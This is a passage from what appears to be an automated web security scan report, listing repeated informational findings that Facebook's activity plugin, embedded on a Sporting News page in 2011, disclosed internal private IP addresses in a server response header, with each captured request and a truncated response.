GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.153.43
X-Cnection: close
Date: Thu, 05 May 2011 01:31:59 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.268. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.239.25

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.239.25
X-Cnection: close
Date: Thu, 05 May 2011 01:43:09 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.269. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.235.83

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.235.83
X-Cnection: close
Date: Thu, 05 May 2011 01:45:56 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.270. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.64.107

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.64.107
X-Cnection: close
Date: Thu, 05 May 2011 02:09:33 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.271. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.170.37

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.170.37
X-Cnection: close
Date: Thu, 05 May 2011 01:54:16 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.272. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.67.39

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.67.39
X-Cnection: close
Date: Thu, 05 May 2011 01:51:30 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.273. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.50.53

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.50.53
X-Cnection: close
Date: Thu, 05 May 2011 00:59:53 GMT
Content-Length: 11936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.274. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.132.121

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.132.121
X-Cnection: close
Date: Thu, 05 May 2011 01:14:20 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.275. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.117.33

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.117.33
X-Cnection: close
Date: Thu, 05 May 2011 01:20:54 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.276. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.137.112

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.137.112
X-Cnection: close
Date: Thu, 05 May 2011 02:19:13 GMT
Content-Length: 11987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.277. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.154.45

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.154.45
X-Cnection: close
Date: Thu, 05 May 2011 01:57:02 GMT
Content-Length: 11987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.278. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.136.103

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.136.103
X-Cnection: close
Date: Thu, 05 May 2011 02:01:15 GMT
Content-Length: 11986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.279. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.98.130

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.98.130
X-Cnection: close
Date: Thu, 05 May 2011 01:11:03 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.280. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.132.111

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.132.111
X-Cnection: close
Date: Thu, 05 May 2011 01:09:41 GMT
Content-Length: 11986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.281. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.192.29

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.192.29
X-Cnection: close
Date: Thu, 05 May 2011 02:13:41 GMT
Content-Length: 11938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.282. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.77.77

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
